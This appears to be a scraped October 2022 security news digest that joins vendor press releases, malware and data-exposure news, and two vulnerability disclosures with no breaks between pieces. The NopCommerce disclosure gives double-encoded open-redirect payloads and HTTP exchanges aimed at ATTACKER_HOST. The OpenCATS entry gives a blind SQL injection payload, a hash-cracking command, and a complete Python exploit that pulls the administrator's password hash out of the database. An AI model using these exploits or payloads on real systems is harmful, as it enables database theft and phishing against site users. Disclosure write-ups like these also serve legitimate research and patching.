New cloud data survey from the Cloud Security Alliance and BigID sheds light on the state of cloud data security in 2022.

NEW YORK, Oct. 20, 2022 /PRNewswire/ — BigID, the leading data intelligence platform that enables organizations to know their enterprise data and take action for privacy, security, and governance, today released the Cloud Data Security Research Report 2022, in partnership with Cloud Security Alliance (CSA) — with results from over 1,500 IT & Security professionals.

The results? According to the survey, organizations consider cloud data security a top 3 priority when protecting data - and cloud data security posture management (DSPM) is critical to addressing gaps.

Key findings include:

*   **Organizations are struggling with securing and tracking sensitive data in the cloud:** Only 4% believe all of their cloud data is sufficiently secured: over a quarter of organizations aren't tracking regulated data, nearly a third aren't tracking confidential or internal data, and 45% aren't tracking unclassified data.
*   **82% of organizations consider capturing dark data a moderate to high priority this year.** Additionally, 79% of organizations reported to have moderate to high levels of concern around the proliferation of dark data in their organization but are unsure about how to approach the challenge.
*   **SaaS Data needs to become a priority:** 76% of organizations rate tracking data across SaaS platforms as moderately to highly difficult.
*   **Organizations are utilizing multiple cloud platforms:** 86% of organizations utilize multiple cloud platforms to store their data- across IaaS, PaaS, and SaaS
*   **62% of organizations** report that they are likely to experience a cloud data breach in the next year.

"Cloud data security is top of mind for organizations of all sizes, showing that many organizations are unprepared to deal with the unique challenges of securing data in the cloud. With the rapid growth of cloud, it is essential that organizations take steps to improve their cloud data security posture," said Dimitri Sirota, CEO and co-founder at BigID. "This research underscores the value of solutions like BigID to accelerate cloud data security with a risk-based, data-first approach that can scale as data continues to expand across the multi-cloud."

To learn more, download a copy of BigID's Cloud Data Security Research Report 2022 today.

**Learn more:**

*   **Read** a summary of the survey at bigid.com/blog
*   **See** a live demo with our security experts at BigID

**Methodology**

The survey was conducted online by CSA in July 2022 and received 1663 responses from IT and security professionals from organizations of various sizes and locations.

**About BigID**

BigID enables organizations to know their enterprise data and take action for data-centric security, privacy, and governance. Companies deploy BigID to proactively discover, manage, protect, and get more value from their regulated, sensitive, and personal data across their data landscape. By applying next-gen ML across the data landscape, BigID's data security, privacy, and governance solutions enrich and extend the modern tech stack, making it easier than ever to discover dark data, reduce risk, accelerate cloud migrations, achieve compliance, and align with security frameworks by taking a data-first approach. Go big with the BigID Data Intelligence Platform or start small with SmallID: the first cloud-native, on-demand data-centric security solution designed to automatically discover, manage, and protect cloud data - across IaaS, PaaS, and SaaS.

Only 4% of Security and IT Leaders Believe All of Their Cloud Data is Sufficiently Secured

External attack surface management leader unveils evolution of risk intelligence solution, including a virtual sandbox environment to safely validate steps to remediation.

PALO ALTO, Calif., Oct. 20, 2022 /PRNewswire/ — CyCognito today announced the next generation of its Exploit Intelligence solution to help security teams prioritize and mitigate the most critical security risks in their external attack surface. Exploit Intelligence leverages CISA, FBI and other threat intelligence sources, including adversary activity, to create advisories that validate where threats in the wild align to risks in the organization.

Sandbox Virtual Lab, a key new feature of Exploit Intelligence, is the industry's first integrated external attack surface sandbox testing environment. Now security teams can simulate how an adversary would compromise a specific asset, quickly validating if and how a vulnerability can be exploited and the potential impact. Additionally, Sandbox Virtual Lab enables repeat asset testing to ensure proper patching.

This initial release of the Sandbox Virtual Lab focusses on Log4j because it remains a pervasive threat. In the coming months, Sandbox Virtual Lab will also support additional simulate Log4Shell, ProxyShell, ProxyLogon and ZeroLogon threats.

"CyCognito's Exploit Intelligence fills a gap between threat intel and vulnerability management," said Rob Gurzeev, CEO, CyCognito. "The addition of Exploit Intelligence doesn't just link vulnerabilities to specific assets, but answers the important question of why it is important to prioritize fixing specific assets immediately because of their attractiveness to active attackers."

Exploit Intelligence dramatically reduces Mean Time to Remediation (MTTR) of an organization's riskiest external assets, saving security teams time and money. CyCognito's unparalleled discovery and mapping engine paired now with integrated Exploit Intelligence gives security teams actionable knowledge (not just data feeds) to build, test and deploy fixes for today's most pervasive threats, such as Log4j.

Features and benefits include:

*   **Remediation Acceleration:** Exploit Intelligence quickly identifies highest-risk exploitable assets within an external attack surface, empowering security teams to reduce response and remediation timelines from months to days.
*   **Curated Intelligence:** Understand how threats are being actively executed by attackers in the wild and how those threats map to vulnerabilities in your attack surface.
*   **Quick Impact Assessment:** A focused map that paints a picture of all assets potentially at risk, including those assets that are already protected and those that remain vulnerable.
*   **Identify Ownership:** The CyCognito discovery engine determines asset ownership to quickly identify who is responsible for fixing vulnerable assets.
*   **Verify and Act with Confidence****:** Safely test exploits against assets in the Sandbox Virtual Lab to determine actual risk to an IT stack.
*   **Mitigate Threats Faster:** Integrates with SIEM/SOAR, ticketing tools and remediation workflows to provide evidence and mitigation guidance.

**About Cycognito  
**CyCognito solves one of the most fundamental business problems in cybersecurity: seeing how attackers view your organization, where they are most likely to break in, what systems and assets are at risk, and how you can eliminate the exposure. Founded by national intelligence agency veterans, CyCognito has a deep understanding of how attackers exploit blind spots and a path of least resistance. The Palo Alto-based company is funded by leading Silicon Valley venture capitalists, and its mission is to help organizations protect themselves from even the most sophisticated attackers. It does this with a category-defining, transformative platform that automates offensive cybersecurity operations to provide reconnaissance capabilities superior to those of attackers.

CyCognito Launches Next Generation of Exploit Intelligence Threat Remediation Platform

HP enhances HP Wolf Security portfolio to stop attackers hijacking privileged access to sensitive data.

PALO ALTO, Calif, October 20, 2022. —– HP Inc. (NYSE: HPQ) today announced enhancements to its HP Wolf Security endpoint protection portfolio, with the launch of Sure Access Enterprise (SAE). SAE protects users with rights to access sensitive data, systems, and applications. It prevents attackers from hi-jacking these privileged sessions – even if the users’ endpoint device is compromised, the access to high value data and systems can remain secure. This stops minor endpoint breaches turning into major security incidents.

Available for both HP and non-HP devices, SAE leverages HP’s unique task isolation technology to run each privileged access session within its own, hardware-enforced virtual machine (VM). This ensures the confidentiality and integrity of the data being accessed, isolating it from any malware in the endpoint operating system. Users are free to conduct privileged, non-privileged, and personal activities securely from one machine. This improves user experience, reduces IT overheads, and enhances protection.

“Gaining access to a privileged users’ device is a critical step in the attack chain. From here, an attacker can scrape credentials, escalate privileges, move laterally, and exfiltrate sensitive data.” comments Ian Pratt, Global Head of Security for Personal Systems at HP Inc. “Sure Access Enterprise is a unique solution that prevents this escalation, thwarting attackers.”

Organizations have several types of users that need to access privileged data, systems, and applications daily. These users range from IT administrators, IoT and OT support staff, through to customer support and finance teams. Allowing these users to perform privileged and non-privileged tasks on the same PC comes with considerable risk. Even if a Privileged Access Management (PAM) system is used to control access to privileged systems, attackers can potentially still usurp privileged sessions, steal sensitive data and credentials, or insert malicious code and commands (e.g., via injected keystrokes, clipboard capture, or memory scraping) if the endpoint is compromised. Traditional best practice has been to issue privileged users with separate dedicated Privileged Access Workstations (PAW) that are used solely for privileged tasks. However, this inconveniences users and increases IT overheads purchasing and managing two systems.

SAE uses advanced hardware-enforced virtualization to create protected VMs that are isolated from the desktop operating system and hence cannot be viewed, influenced, or controlled by it. Thus, confidentiality and integrity of the application and data inside the protected VM can be assured, without the operational cost and complexity of issuing a separate PAW.

“By isolating tasks in protected VMs, which are transparent to the end user, Sure Access Enterprise breaks the attack chain,” continues Pratt. “As well as protecting System Administrators accessing high-value servers, SAE can be used to protect other sensitive assets – for example, protecting credit card details accessed by customer support at a retailer, patient data access at a healthcare provider, or connections to an Industrial Control System at a manufacturer.”

Sure Access Enterprise is available now and features:

*   **Strong Integrations** with Privileged Access Management (PAM) solutions (e.g., CyberArk, BeyondTrust), IPSec remote access tunnels and Multifactor Authentication (MFA).
*   **Centralized Management** to enable separation of duties and flexible policy options – such as locking connections to specific PCs or users or requiring HP Sure View activation for privacy.
*   **Hardware root of trust**, supported by the latest Intel® technologies, to prevent malware from bypassing security controls
*   **Encrypted, tamper-resistant session logging** to track access, without recording sensitive data or credentials, easing compliance.

To learn more, visit: https://www.hp.com/uk-en/security/endpoint-security-solutions.html

About HP  

HP Inc. is a technology company that believes one thoughtful idea has the power to change the world. Its product and service portfolio of personal systems, printers, and 3D printing solutions helps bring these ideas to life. Visit http://www.hp.com.

About HP Wolf Security

From the maker of the world’s most secure PCs and Printers, HP Wolf Security is a new breed of endpoint security. HP’s portfolio of hardware-enforced security and endpoint-focused security services are designed to help organizations safeguard PCs, printers, and people from circling cyber predators. HP Wolf Security provides comprehensive endpoint protection and resiliency that starts at the hardware level and extends across software and services.

HP Launches Sure Access Enterprise to Protect High Value Data and Systems

Bolster delivers intelligence and remediation across web, social media, app stores, and Dark Web, with 24/7, live SOC support.

**Los Altos, CA- October 20, 2022 —** Bolster, Inc., the automated digital risk protection company, today announced the addition of Dark Web Intelligence and 24/7 support. Bolster’s new Dark Web offering is the easiest to use actionable threat solution on the market - adding to the value of the entire Bolster product portfolio. Customers will have access to a comprehensive platform able to monitor and protect their brand across the web, social media, app stores and dark web; with access to experts 24/7.

Designed for actionable insight, Bolster’s Dark Web monitoring allows organizations to gather threat intelligence across the dark web and predict how threat actors will behave and act. Organizations can discover hacking tools, exploit kits, relevant chatter and how that affects a brand. The Bolster platform offers automated and curated responses that deliver the most effective risk mitigation strategy internally.

“Because the dark web can be a place of great intelligence on pre and post breach information, having dark web monitoring is essential to understanding threats to your brand,” said Abhishek Dubey, co-founder and CEO of Bolster, Inc. “We have designed our solution to be completely actionable by allowing customers to create curated, automated workflows when they spot a certain type of alert or activity. This allows for an easy method of both obtaining instant insight and responding quickly and effectively to threats.”

When a threat or suspicious activity is discovered, customers now have the ability to call a security expert 24/7 and 365 days a year. The 24/7 support offering provides the following services:

*   **Around the Clock Support:** Whether it be active online threats or questions about reporting, Bolster’s 24 hour, 7 days a week, 365 days a year SOC team support will put customers in direct contact with a security expert.

*   **Strategic Planning:** A dedicated, curated quarterly business review and executive reporting will be available to provide consulting, configuration strategies, best practices, strategic adversary services, and more. Strategic planning will help organizations plan for and mitigate future risks.

*   **Expert Management:** Bolster managed services allow customers to focus on their core business objectives while they handle the detection, monitoring, and takedown of threats to brands. Customers will have a trusted team of experts to navigate the digital risk landscape.

With dark web intelligence and around the clock expert support built into the Bolster platform, customers have the one consistent, intuitive experience to track threats across any online channel. Ease of use and a hands-off remediation process will help ease training and administration as well as refocus IT resources to other core business objectives. Bolster offers the industry’s best user experience for detecting, monitoring, and remediating digital risk.

For more information on Bolster, please visit: https://bolster.ai/

**About Bolster, Inc.**  

At Bolster, our mission is to make the internet safe for everyone. That's why we created the first and only fully automated platform purpose-built from the ground up to detect, monitor, and take down fraudsters on the Internet. We call it Automated Digital Risk Protection. Our comprehensive platform offers the most efficient protection across web, social media, app stores and the dark web to combat fraudulent sites and content. Bolster was founded in 2017 by security industry veterans with headquarters in Los Altos, CA. To learn more, go to www.bolster.ai.

Bolster Deepens Platform with Dark Web Threat Intelligence and 24/7 Support

Multiple open redirect vulnerabilities in NopCommerce 4.10 through 4.50.1 allow remote attackers to conduct phishing attacks by redirecting users to attacker-controlled web sites via the returnUrl parameter, processed by the (1) ChangePassword function, (2) SignInCustomerAsync function, (3) SuccessfulAuthentication method, or (4) NopRedirectResultExecutor class.

**Info**

Multiple Open Redirects in NopCommerce

Software Link

NopCommerce Web Platform

Affected Versions

4.10 - 4.50.1

Tested on

NopCommerce 4.40, 4.50.1

Vulnerable Components

src/Presentation/Nop.Web.Framework/Mvc/Routing/NopRedirectResultExecutor.cs,  
src/Presentation/Nop.Web/Controllers/CustomerController.cs,  
src/Libraries/Nop.Services/Customers/CustomerRegistrationService.cs,  
src/Libraries/Nop.Services/Authentication/External/ExternalAuthenticationService.cs

CVSS 3.0

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

CVE

CVE-2022-26954

**Summary**

Multiple flaws in the handling of returnurl parameter allow for multiple open redirects in the application that may be abused by an attacker to construct successful phishing campaigns on application users by crafting URLs of legitimate application that will seamlessly redirect users to attacker-controlled resources.

**Fix**

The issue was fixed in the minor NopCommerce 4.50.2 release on April 14th 2022.

Code commit with corresponding fixes

**Details**

The NopCommerce web application uses the UrlHelper.IsLocalUrl built into the C# framework to prevent open redirections when handling user-supplied URL path parameters, such as returnUrl.

...
//prevent open redirection attack
if (!Url.IsLocalUrl(returnUrl))
    return RedirectToAction("Index", "Home", new { area \= AreaNames.Admin });

return Redirect(returnUrl);
...

_Code snippet illustrating checks over returnUrl parameter prior to the redirection_

However, this defence mechanism is not consistently implemented within the application controllers. In particular, the following controller methods are missing the functionality:

*   ChangePassword (src/Presentation/Nop.Web/Controllers/CustomerController.cs)
    
    \[HttpPost\]
    public virtual async Task<IActionResult\> ChangePassword(ChangePasswordModel model, string returnUrl)
    {
      ...
    	if (changePasswordResult.Success)
      {
          \_notificationService.SuccessNotification(await \_localizationService.GetResourceAsync("Account.ChangePassword.Success"));
          return string.IsNullOrEmpty(returnUrl)  ? View(model) : new RedirectResult(returnUrl);
      }
      ...
    }
    
*   SignInCustomerAsync (src/Libraries/Nop.Services/Customers/CustomerRegistrationService.cs)
    
    public virtual async Task<IActionResult\> SignInCustomerAsync(Customer customer, string returnUrl, bool isPersist \= false)
    {
        ...
        //redirect to the return URL if it's specified
        if (!string.IsNullOrEmpty(returnUrl))
            return new RedirectResult(returnUrl);
    
        return new RedirectToRouteResult("Homepage", null);
    }
    
*   SuccessfulAuthentication (src/Libraries/Nop.Services/Authentication/External/ExternalAuthenticationService.cs)
    
    protected virtual IActionResult SuccessfulAuthentication(string returnUrl)
    {
        //redirect to the return URL if it's specified
        if (!string.IsNullOrEmpty(returnUrl))
            return new RedirectResult(returnUrl);
    
        return new RedirectToRouteResult("Homepage", null);
    }
    

The aforementioned methods do not contain any checks over the user supplied value, and thus are vulnerable to the open redirects. Open redirects can be triggered by sending the following requests to the application:

_An up-to-date build (on 17.02.2022) from the official NopCommerce GitHub was used to demonstrate the issue_

    POST /login?returnurl=https://google.com HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 242
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/login?returnUrl=https://google.com
    Cookie: COOKIES
    
    Email=EMAIL&Password=PASS&__RequestVerificationToken=CSRF_TOKEN&RememberMe=false
    
    HTTP/1.1 302 Found
    Content-Length: 0
    Connection: close
    Date: Thu, 17 Feb 2022 08:11:48 GMT
    Server: Kestrel
    Cache-Control: no-cache,no-store
    Content-Language: en-US
    Expires: Thu, 01 Jan 1970 00:00:00 GMT
    Location: https://google.com
    

_Open redirect after a successful login_

    POST /customer/changepassword?returnUrl=https://google.com HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 318
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/customer/changepassword
    Cookie: COOKIES
    Upgrade-Insecure-Requests: 1
    
    OldPassword=OLD_PASS&NewPassword=NEW_PASS&ConfirmNewPassword=NEW_PASS&__RequestVerificationToken=CSRF_TOKEN
    
    HTTP/1.1 302 Found
    Content-Length: 0
    Connection: close
    Date: Thu, 17 Feb 2022 09:02:15 GMT
    Server: Kestrel
    Content-Language: en-US
    Location: https://google.com/
    X-MiniProfiler-Ids: ["9d6e3a1a-9f9f-4caa-ae31-35b2332ce128"]
    

_Open redirect after a successful password change_

Furthermore, a flaw in a custom RedirectResultExecutor class, used to handle all HTTP redirects in the application, can be abused to **bypass any defence mechanisms and perform open redirects in any application controllers that use client-side supplied input (e.g., in returnUrl) to perform the redirect**.

The issue is exploitable in all versions from commit #2731 Add URL encoding on redirection to URL with non-ASCII chars(January 23, 2018) to commit #3192 Fixed URL encoding on redirect (November 24, 2021).

Code of the vulnerable NopRedirectResultExecutor.ExecuteAsync method, located in src/Presentation/Nop.Web.Framework/Mvc/Routing/NopRedirectResultExecutor.cs, is shown below:

/// <summary\>
/// Execute passed redirect result
/// </summary\>
/// <param name\="context"\>Action context</param\>
/// <param name\="result"\>Redirect result</param\>
/// <returns\>A task that represents the asynchronous operation</returns\>
public override Task ExecuteAsync(ActionContext context, RedirectResult result)
{
    if (result \== null)
        throw new ArgumentNullException(nameof(result));

    if (\_securitySettings.AllowNonAsciiCharactersInHeaders)
    {
        //passed redirect URL may contain non-ASCII characters, that are not allowed now (see https://github.com/aspnet/KestrelHttpServer/issues/1144)
        //so we force to encode this URL before processing
        result.Url \= WebUtility.UrlDecode(result.Url);
    }

    return base.ExecuteAsync(context, result);
}

The application URL-decodes the returnUrl parameter and puts it directly into the Location header of the response served to the client.

Any preceding IsLocalUrl checks can be effectively ignored by adding the second / character (char 0x27) in double-URI encoding.

For example, the payload returnUrl=%2f%252fgoogle.com will undergo the following processing:

1.  The application web server will natively decode the first layer of URL encoding and pass it to the controller:
    
    %2f%252fgoogle.com --> /%2fgoogle.com
    
2.  The controller will perform the IsLocalUrl check over the /%2fgoogle.com value:
    
    Since the second / is still being encoded as %2f , the function will return true:
    
    IsLocalUrl("/%2fgoogle.com") --> true
    
3.  The /%2fgoogle.com value will be used to call Redirect function
    
4.  The /%2fgoogle.com value will be processed by the NopRedirectResultExecutor, once more decoded into //google.com, and directly served in the Location header:
    
    result.Url \= WebUtility.UrlDecode(result.Url); // will result in "//google.com"
    ...
    return base.ExecuteAsync(context, result);
    

    [*] returnUrl value: "/%2fgoogle.com"
    [+] result.Url value: "//google.com"
    

_Verbose printing of local variables inside the NopRedirectResultExecutor during processing of an attacker-injected value_

Thus, it is possible to achieve the following server behavior in all client-side controlled redirects:

    POST /en/login?returnurl=%2F%252fATTACKER_HOST HTTP/2
    Host: localhost
    Cookie: COOKIES
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 249
    
    Username=USER&Password=PASS&__RequestVerificationToken=CSRF_TOKEN&RememberMe=false
    
    HTTP/2 302 Found
    Date: Tue, 15 Feb 2022 20:48:29 GMT
    Content-Length: 0
    Cache-Control: no-cache
    Pragma: no-cache
    Expires: Thu, 01 Jan 1970 00:00:00 GMT
    Location: //ATTACKER_HOST
    

A Location header value of //ATTACKER_HOST is actually a valid, shortened form of CURRENT_URI_SHEME://ATTACKER_HOST and will be successfully processed and followed to by modern browsers.

NopRedirectResultExecutor was partially fixed in BugFix #3192 and now uses extra processing before returning the value to the client:

/// <summary\>
/// Execute passed redirect result
/// </summary\>
/// <param name\="context"\>Action context</param\>
/// <param name\="result"\>Redirect result</param\>
/// <returns\>A task that represents the asynchronous operation</returns\>
public override Task ExecuteAsync(ActionContext context, RedirectResult result)
{
    if (result \== null)
        throw new ArgumentNullException(nameof(result));

    if (\_securitySettings.AllowNonAsciiCharactersInHeaders)
    {
        //passed redirect URL may contain non-ASCII characters, that are not allowed now (see https://github.com/aspnet/KestrelHttpServer/issues/1144)
        //so we force to encode this URL before processing
        var url \= WebUtility.UrlDecode(result.Url);

        var urlHelper \= result.UrlHelper ?? \_urlHelperFactory.GetUrlHelper(\_actionContextAccessor.ActionContext);
        
				var isLocalUrl \= urlHelper.IsLocalUrl(url);

        var uri \= new Uri(isLocalUrl ? $"{\_webHelper.GetStoreLocation().TrimEnd('/')}{url}" : url, UriKind.Absolute);
        
        result.Url \= isLocalUrl ? uri.PathAndQuery : $"{uri.GetLeftPart(UriPartial.Query)}{uri.Fragment}";      
		}
    return base.ExecuteAsync(context, result);
}

The following mutations are performed on the attacker-injected /%2fgoogle.com value:

1.  The application URL-decodes the returnUrl parameter value into a url variable.
2.  The url is checked with the built-in IsLocalUrl helper check to determine if it is relative or not.
3.  The check returns false on the decoded value//google.com , and the url is then processed as external.
4.  The application then initiates a new uri variable that uses the built-in Uri class to process the //google.com value as an absolute URL. The Uri class constructor, due to the lack of a URI scheme, will treat the value as local path and prepends a file:// schema.
5.  The uri variable is converted back to string.
6.  The resulting value is served to the client in the Location header.

Although the core weakness with bypassing the preceding IsLocalUrl checks on returnUrl values still can be exploited by an attacker to achieve an open redirect, the file:// schema that is now returned back to the browser has almost no practical impact, as it is likely ignored by the browsers’ security policies (ERROR_INSECURE_REDIRECT). However, the issue can still affect HTTP clients that use the native API for communication and data processing.

    [*] returnUrl value: "/%2fgoogle.com"
    [*] url value: "//google.com"
    [?] isLocalUrl value: False
    [*] uri value: Uri(file://google.com/)
    [+] Resulting redirect URI value: Uri(file://google.com/)
    

_New behavior processing logs from supplying /%252fgoogle.com into the returnUrl_

    POST /login?returnurl=/%252fgoogle.com HTTP/1.1
    Host: localhost
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 252
    Cookie: COOKIES
    
    Email=EMAIL&Password=PASS&__RequestVerificationToken=CSRF_TOKEN&RememberMe=false
    
    HTTP/1.1 302 Found
    Content-Length: 0
    Connection: close
    Date: Tue, 15 Feb 2022 20:40:34 GMT
    Server: Kestrel
    Expires: Thu, 01 Jan 1970 00:00:00 GMT
    Location: file://google.com/
    

_New NopRedirectResultExecutor behavior on local instance of the up-to-date (17.02.2022) application compiled from GitHub source code_

CVE-2022-26954: [CVE-2022-26954] Multiple Open Redirects in NopCommerce

The Ursnif malware has become the latest malware to shed its roots as a banking trojan to revamp itself into a generic backdoor capable of delivering next-stage payloads, joining the likes of Emotet, Qakbot, and TrickBot.
"This is a significant shift from the malware's original purpose to enable banking fraud, but is consistent with the broader threat landscape," Mandiant researchers Sandor

The Ursnif malware has become the latest malware to shed its roots as a banking trojan to revamp itself into a generic backdoor capable of delivering next-stage payloads, joining the likes of Emotet, Qakbot, and TrickBot.

"This is a significant shift from the malware's original purpose to enable banking fraud, but is consistent with the broader threat landscape," Mandiant researchers Sandor Nemes, Sulian Lebegue, and Jessa Valdez disclosed in a Wednesday analysis.

The refreshed and refactored variant, first spotted by the Google-owned threat intelligence firm in the wild on June 23, 2022, has been codenamed LDR4, in what's being seen as an attempt to lay the groundwork for potential ransomware and data theft extortion operations.

Ursnif, also called Gozi or ISFB, is one of the oldest banker malware families, with the earliest documented attacks going as far back as 2007. Check Point, in August 2020, mapped the "divergent evolution of Gozi" over the years, while pointing out its fragmented development history.

Almost a year later in late June 2021, a Romanian threat actor, Mihai Ionut Paunescu, was arrested by Colombian law enforcement officials for his role in propagating the malware to no fewer than a million computers from 2007 to 2012.

The latest attack chain detailed by Mandiant demonstrates the use of recruitment and invoice-related email lures as an initial intrusion vector to download a Microsoft Excel document, which then fetches and launches the malware.

The major refurbishment of Ursnif eschews all its banking-related features and modules in favor of retrieving a VNC module and gaining a remote shell into the compromised machine, which are carried out by connecting to a remote server to obtain said commands.

"These shifts may reflect the threat actors' increased focus towards participating in or enabling ransomware operations in the future," the researchers said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New Ursnif Variant Likely Shifting Focus to Ransomware and Data Theft

The data exposure was the result of an "unintentional misconfiguration on an endpoint" and not a security vulnerability, Microsoft said.

Sensitive information for some Microsoft customers were exposed by a misconfigured server, Microsoft Security Response Center said on Wednesday. The misconfigured endpoint was accessible on the Internet and did not require authentication.

The exposed information included names, email addresses, email content, company name, phone numbers, and files "relating to business between a customer and Microsoft or an authorized Microsoft partner," the company said. The endpoint has already been secured to require authentication, and affected customers have been notified.

"This misconfiguration resulted in the potential for unauthenticated access to some business transaction data corresponding to interactions between Microsoft and prospective customers, such as the planning or potential implementation and provisioning of Microsoft services," Microsoft said, noting that there is no indication that customer accounts or systems had been compromised.

Microsoft learned of the misconfiguration on Sept. 24 from a research team at SOCRadar.

SOCRadar's researchers claimed in their own blog post to have found 2.4TB of emails and project files containing Statement of Work documents, product orders, project details, personally identifiable information, invoices, price lists, and "documents that may reveal intellectual property." The researchers claimed the exposed information could be linked to more than 65,000 entities from 111 countries.

Microsoft said SOCRadar "greatly exaggerated the scope of this issue" and did not account for duplicate records in its estimate of affected entities. Microsoft also said SOCRadar's decision to release a search tool to look through the files "is not in the best interest of ensuring customer privacy or security and potentially exposing them to unnecessary risk."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Microsoft Customer Data Exposed by Misconfigured Server

On specific hardware platforms, on BIG-IP versions 16.1.x before 16.1.3.1, 15.1.x before 15.1.7, 14.1.x before 14.1.5.1, and all versions of 13.1.x, while Intel QAT (QuickAssist Technology) and the AES-GCM/CCM cipher is in use, undisclosed conditions can cause BIG-IP to send data unencrypted even with an SSL Profile applied.

CVE-2022-41983

OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the tag_id variable in the Tag update function.

**SQL injection vulnerability in OpenCats 'Tag' update functionality.**

OpenCats version 0.9.6 PHP7.2 suffers from SQL injection vulnerability. This allows attackers control over the application's database.

User has control over tag\_id variable, which allows SQL injection in UPDATE statement via time-based/blind techniques.

Application builds the following query:  
UPDATE tag SET title = 'Title', description = 'Description' WHERE tag_id = XXX AND site_id = 1;

User has control over XXX part.

1337 OR 1337=(select IF(substr(database(),1,1)='a',(select sleep(3)), (select sleep(1)))))

With this payload, application will sleep for 3 seconds for every entry inside original table if the database() query result starts with 'a', otherwise it will sleep for one second.

With this time-based blind technique, attacker is able to exfiltrate any information from the database by querying many YES/NO questions to the database and intelligently measuring response times.

**POC**

This proof of concept exfiltrates administrator user's password hash:  
(select password from user where user_id=1)

**Bonus, let's crack the hash**

echo "password:21232f297a57a5a743894a0e4a801fc3" > hash.txt  
john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5 hash.txt

**xploit.py!**

import requests
import string
import sys

def inRange(rTime, averageTime, sleepAmount):
    if(rTime \> sleepAmount and rTime < rTime + (averageTime\*20/100) and rTime \> rTime \- (averageTime\*20/100)):
        return True
    else: return False

headers \= {}
proxies \= {}
#proxies\["http"\] = "http://127.0.0.1:8080"

#Login and get session cookie..
#Change this
headers\["Cookie"\] \= "CATS=cl2201l24aihqlnch0jgnr4pd2"
url \= "http://192.168.203.135/opencats/index.php?m=settings&a=ajax\_tags\_upd"

#Prepare Content-Type for POST request compability
headers\["Content-Type"\] \= "application/x-www-form-urlencoded"
#Prepare POST parameter 'tag\_id'
postdata \= "tag\_id=PWN&tag\_title=test"

#Change this depending on the endpoint
tempPayload \= "1 OR 1=(sleep(3))"

print("Sending few request to determine average response time...")

timeSum \= 0
numberOfBaselineRequests \= 5
for i in range(numberOfBaselineRequests):
    try:
        rTest \= requests.post(url, headers \= headers, data\=postdata.replace('PWN','1337'), proxies \= proxies) 
        timeSum  += rTest.elapsed.total\_seconds()
        if('<form name="loginForm"' in rTest.text):
            print("Session cookie not valid, change it inside .py")
            sys.exit(\-1)
    except:
        print("Some exception ocurred while sending or receiving data from the application. Make sure IP is good. Exiting..")
        sys.exit(\-1)

averageTime \= timeSum/numberOfBaselineRequests
print("Average response time for " + str(numberOfBaselineRequests) + " requests is : " + str(averageTime))

print("\\nTrying to inject sleep(3)")
r \= requests.post(url, headers \= headers, data \= postdata.replace('PWN',tempPayload), proxies \= proxies)
rTime \= r.elapsed.total\_seconds()
print("Response time: " + str(rTime))

if(inRange(rTime, averageTime, 3)):
    print("\\n\[+\] Application is vulnerable to SQL injection...")

#Getting value for false statement -> sleep(1)
tempPayload2 \= "1 or 1=(sleep(0.1))"
r2 \= requests.post(url, headers \= headers, data \= postdata.replace('PWN',tempPayload2), proxies \= proxies)
t\_sleep\_one \= r2.elapsed.total\_seconds()

tempPayload3 \= "1 or 1=(sleep(0.3))"
r3 \= requests.post(url, headers \= headers, data\=postdata.replace('PWN', tempPayload3), proxies \= proxies)
t\_sleep\_three \= r3.elapsed.total\_seconds()

print("False statement time: " + str(t\_sleep\_one))
print("True statement time: " + str(t\_sleep\_three) + "\\n")

length \= 0
exfilQuery \= "1 OR 1=(IF(length((select password from user where user\_id=1))='XXX',sleep(0.3),sleep(0.1)))"
#Determine length of the result that we want. i.e select passwrod from user query...
print("Determining the result length of our query...")

while(True):
    q \= exfilQuery.replace('XXX', str(length))
    r \= requests.post(url, headers \= headers, data \= postdata.replace('PWN', q))
    time \= r.elapsed.total\_seconds()

    #If sleep(3) gets executed, we have correct length
    if(time \> (t\_sleep\_one+(t\_sleep\_one\*20/100))):
        print("Got length " + str(length))
        break
    
    length += 1
    if(length \== 1000):
        break
    
if(length \== 0 or length \== 1000):
    print("Something is wrong. Exiting...")
    sys.exit(\-1)
else: print("Length of '(select password from user where user\_id=1)' query: " + str(length))

#OK----|
alphanumerics \= list(string.ascii\_lowercase + string.digits)
exfilQuery \= "1 OR 1=(IF(substr((select password from user where user\_id=1),YYY,1) = 'XXX',sleep(0.3), sleep(0.1)))"

data \= \[\]
print("Exfiltrating data. Query: (select password from user where user\_id=1). Patience...")

for i in range(length):
    for item in alphanumerics:
        q \= exfilQuery.replace('XXX',str(item))
        q \= q.replace('YYY',str(i+1))
        r \= requests.post(url, headers \= headers, data \= postdata.replace('PWN',q), proxies \= proxies)
        time \= r.elapsed.total\_seconds()
        #print(str(time) + "\\n")
        if(time \> (t\_sleep\_one+(t\_sleep\_one\*20/100))):
            print(str(i+1) + ". Letter = " + item)
            data.append(item)
            break

print("(select password from user where user\_id=1) -> " + "".join(data))

CVE-2022-43020: opencats_zero-days/SQLI_in_Tag_Updates.md at main · hansmach1ne/opencats_zero-days

New version boosts VPN tunnel performance and lets users prioritize secure connection traffic for certain services.

**Woburn, Mass., Oct. 19, 2022** — Today Kaspersky unveiled a new version of Kaspersky VPN Secure Connection, which introduces a dramatic 200% boost in VPN tunnel performance, compared to 2020. A split-tunneling feature grants users the ability to prioritize secure connection traffic for certain services, while a VPN-for-routers capability automatically re-routes any connected device at home.

Global VPN usage is on the rise, with the market set to reach a colossal $77.1 billion by 2026. This comes as no surprise, since installing a VPN provides a quick and easy way to improve security and prevent data from falling into the wrong hands. It does this by routing data through an encrypted tunnel, which hides the IP address and makes it look as though the connection has come from elsewhere.

